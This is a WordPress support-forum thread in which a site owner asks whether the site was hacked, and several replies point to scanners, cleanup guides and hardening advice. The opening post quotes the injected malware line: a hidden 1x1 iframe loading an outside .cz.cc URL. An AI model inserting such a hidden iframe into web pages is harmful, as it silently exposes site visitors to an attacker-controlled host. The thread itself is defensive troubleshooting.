Forums

WordPress › Support » How-To and Troubleshooting

Was I hacked? (7 posts)

  1. deiffert
    Member
    Posted 11 months ago #

    http://believerscenter.com - Line #1:

    <iframe src="http://ulbmrwtvpa.cz.cc/?go=1" width="1" height="1"></iframe>

    Can't figure out how to get this iframe off or where it's coming from!!!

  2. t-p
    Member
    Posted 11 months ago #

    look into this plugin: http://wordpress.org/extend/plugins/exploit-scanner/

  3. deiffert
    Member
    Posted 11 months ago #

    Thanks for the response.

    Hmmm.... well the report it spits out is pretty intimidating.

    Level Severe (313 matches)

    Scrolled through for about 5 minutes and couldn't find anything significant to me. All pretty basic stuff, although with that large amount it's possible that I could have missed something. Is there something specific I should search for?

    Has no one else had this problem?

  4. Ipstenu
    Half-Elf Support Rogue & Mod
    Posted 11 months ago #

    http://codex.wordpress.org/FAQ_My_site_was_hacked is a good resource to start with

  5. esmi
    Theme Diva & Forum Moderator
    Posted 11 months ago #

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

  6. Richard Coan
    Member
    Posted 11 months ago #

    Remember to follow rule number one when you discover foreign code on your site:
    1) Do not panic.

    This one of the pretty common "hacks" I'd run across while maintaining WordPress Sites for my last contract. If this was inserted onto every page, post, etc then your database was compromised possibly. Changing the Password is recommended, note you'll need to update your WordPress config file manually with the new password. Also you may want to look into securing your wp-config file, it can be placed outside of the web-root. You could also deny access to the file via the htaccess file.

    Check your plugins also, one of them may have been compromised which allowed the someone access to your database. I was using the category-page plugin on one site which I later parsed through the entire plugin and found it was compromised.

    Media Temple has a guide to cleaning up your database if that is your host, pretty simple SQL method of finding something like that iframe and removing them.

    Good luck, if you have and questions ask.

  7. Richard Coan
    Member
    Posted 11 months ago #

    Here is one of the links for hardening wordpress once you are all cleaned up:
    http://codex.wordpress.org/Hardening_WordPress

Reply

You must log in to post.

About this Topic

Tags